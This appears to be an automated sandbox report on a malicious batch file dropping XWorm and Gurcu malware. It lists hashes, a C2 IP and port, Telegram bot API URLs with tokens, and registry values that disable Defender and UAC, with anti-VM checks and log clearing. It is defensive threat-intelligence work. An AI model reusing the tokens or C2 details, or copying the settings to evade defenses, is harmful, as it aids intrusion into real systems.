Analysis
-
max time kernel
179s -
max time network
175s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
04/04/2025, 13:56
Static task
static1
Behavioral task
behavioral1
Sample
seven.bat
Resource
win10v2004-20250314-en
General
-
Target
seven.bat
-
Size
13KB
-
MD5
72b37c80ee58d00b5ffa174aabbb0b57
-
SHA1
cf6c0f3bca62c83da4ee34c4929262bad1770ba1
-
SHA256
a32aab9ec5b65cb24c9bec2cef92239ea0d27937123d2569b95530101e1c3459
-
SHA512
63d5a1a2daa676b8079f0da3d062659e661a1228211cbdd5aec4e86713847ee66071c956c34a2b3c20a70613ee9a3275f4e6ae1b3fb958e31f1d0002c27b711e
-
SSDEEP
384:c1ENmEhhmE77EIGujENmEhhmE77EIGD+G2dAI8b/mHT9YT3Q6TbsebaQD4Lforql:8Spb6jDGams
Malware Config
Extracted
xworm
89.23.100.91:7174
-
Install_directory
%ProgramData%
-
install_file
csrss.exe
-
telegram
https://api.telegram.org/bot7044550017:AAG7R8kaIhFKV-CXgKS_6BPleXbgza38o8w
Extracted
gurcu
https://api.telegram.org/bot6338125361:AAEpz2yMO25tDxVh4mOCZ2gjyEu5ZDJz6R4/sendMessag
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000c00000002430f-99.dat family_xworm behavioral1/memory/3528-101-0x00000000000C0000-0x00000000000D8000-memory.dmp family_xworm -
Disables service(s) 3 TTPs
-
Gurcu family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Xworm family
-
Blocklisted process makes network request 8 IoCs
flow pid Process 25 5508 powershell.exe 28 5508 powershell.exe 30 5816 powershell.exe 32 5816 powershell.exe 35 5388 powershell.exe 36 5388 powershell.exe 39 3488 powershell.exe 40 3488 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Powershell Invoke Web Request.
pid Process 5508 powershell.exe 5816 powershell.exe 5388 powershell.exe 3488 powershell.exe 536 powershell.exe 4980 powershell.exe 4884 powershell.exe 3396 powershell.exe 4660 powershell.exe 3452 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 4 IoCs
flow pid Process 28 5508 powershell.exe 32 5816 powershell.exe 36 5388 powershell.exe 40 3488 powershell.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 5 IoCs
pid Process 5176 Launcher.exe 2648 start.exe 3528 explorer.exe 4464 explorerS.exe 1800 explorer.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 27 raw.githubusercontent.com 28 raw.githubusercontent.com 32 raw.githubusercontent.com 36 raw.githubusercontent.com 40 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 42 ip-api.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1944 powercfg.exe 5236 powercfg.exe 2072 powercfg.exe 4652 powercfg.exe 1816 powercfg.exe 5248 powercfg.exe 1568 powercfg.exe 368 powercfg.exe -
Drops file in System32 directory 12 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\MRT.exe explorerS.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe explorer.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4464 set thread context of 3712 4464 explorerS.exe 256 PID 1800 set thread context of 4060 1800 explorer.exe 289 PID 1800 set thread context of 3704 1800 explorer.exe 291 PID 1800 set thread context of 5488 1800 explorer.exe 295 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN start.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\load-hub-i18n.bundle.js msedge.exe File created C:\Program Files\msedge_url_fetcher_4164_623211769\84d3e481-77df-49da-bc37-0a994069ddb9 msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\lo\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\iw\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\es\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\sk\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-hr.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-shared-components\id\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\uk\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\en_CA\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-lv.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\manifest.fingerprint msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-mobile-hub\es\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\128.png msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_286652685\manifest.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-gu.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-ec\pt-BR\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-ec\zh-Hans\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-hub\de\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-hub\pl\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-hub\pt-BR\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\pt_BR\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\en\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\az\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-mr.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-sl.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-notification-shared\fr\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-notification-shared\it\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-tokenized-card\pt-BR\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\el\messages.json msedge.exe File created C:\Program Files\msedge_url_fetcher_4164_1544650857\bf8090eb-6e5c-4c51-9250-5bf9b46cf160 msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_2081323541\manifest.fingerprint msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1071498887\_metadata\verified_contents.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-bn.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_94072451\Filtering Rules-CA msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_98857137\shopping.html msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-shared-components\hu\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\gl\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_94072451\Part-FR msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-mobile-hub\de\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\wallet\wallet-notification-config.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\Mini-Wallet\miniwallet.bundle.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_568815681\_platform_specific\win_x64\widevinecdm.dll msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\af\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\fil\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\is\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-gl.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_94072451\Part-NL msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-hub\es\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\manifest.fingerprint msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_568815681\LICENSE msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\et\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\sv\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-hub\zh-Hans\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-mobile-hub\fr\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-notification\el\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-notification\sv\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-shared-components\cs\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\manifest.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-pa.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-mobile-hub\id\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_2126383388\regex_patterns.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_286652685\manifest.fingerprint msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-nn.hyb msedge.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe -
Launches sc.exe 52 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1816 sc.exe 5828 sc.exe 1384 sc.exe 5628 sc.exe 1732 sc.exe 4600 sc.exe 2004 sc.exe 4672 sc.exe 2804 sc.exe 904 sc.exe 5568 sc.exe 4504 sc.exe 2812 sc.exe 5796 sc.exe 4476 sc.exe 412 sc.exe 5504 sc.exe 5708 sc.exe 4948 sc.exe 1780 sc.exe 4284 sc.exe 1908 sc.exe 4164 sc.exe 1696 sc.exe 2980 sc.exe 4316 sc.exe 3660 sc.exe 1596 sc.exe 3044 sc.exe 888 sc.exe 2212 sc.exe 2604 sc.exe 5684 sc.exe 3044 sc.exe 2836 sc.exe 1396 sc.exe 4908 sc.exe 1472 sc.exe 5196 sc.exe 4824 sc.exe 3956 sc.exe 4320 sc.exe 6040 sc.exe 4896 sc.exe 1756 sc.exe 5788 sc.exe 3776 sc.exe 3216 sc.exe 1176 sc.exe 3472 sc.exe 1340 sc.exe 1992 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Launcher.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3516 PING.EXE 6056 PING.EXE 4864 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Kills process with taskkill 45 IoCs
pid Process 2856 taskkill.exe 5404 taskkill.exe 2460 taskkill.exe 6076 taskkill.exe 1500 taskkill.exe 4812 taskkill.exe 5664 taskkill.exe 2052 taskkill.exe 5284 taskkill.exe 1020 taskkill.exe 6016 taskkill.exe 5652 taskkill.exe 3620 taskkill.exe 5720 taskkill.exe 116 taskkill.exe 2176 taskkill.exe 5216 taskkill.exe 5096 taskkill.exe 344 taskkill.exe 4552 taskkill.exe 1468 taskkill.exe 5456 taskkill.exe 2784 taskkill.exe 3420 taskkill.exe 4660 taskkill.exe 3920 taskkill.exe 5116 taskkill.exe 4156 taskkill.exe 3112 taskkill.exe 2960 taskkill.exe 4404 taskkill.exe 5492 taskkill.exe 3300 taskkill.exe 2192 taskkill.exe 4764 taskkill.exe 5876 taskkill.exe 2564 taskkill.exe 4804 taskkill.exe 2288 taskkill.exe 4656 taskkill.exe 2236 taskkill.exe 5768 taskkill.exe 5764 taskkill.exe 5956 taskkill.exe 5488 taskkill.exe -
Modifies data under HKEY_USERS 62 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1743775129" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 04 Apr 2025 13:58:50 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133882486767652868" msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={BFF26C8E-FFF8-4822-B5D6-134722349977}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created 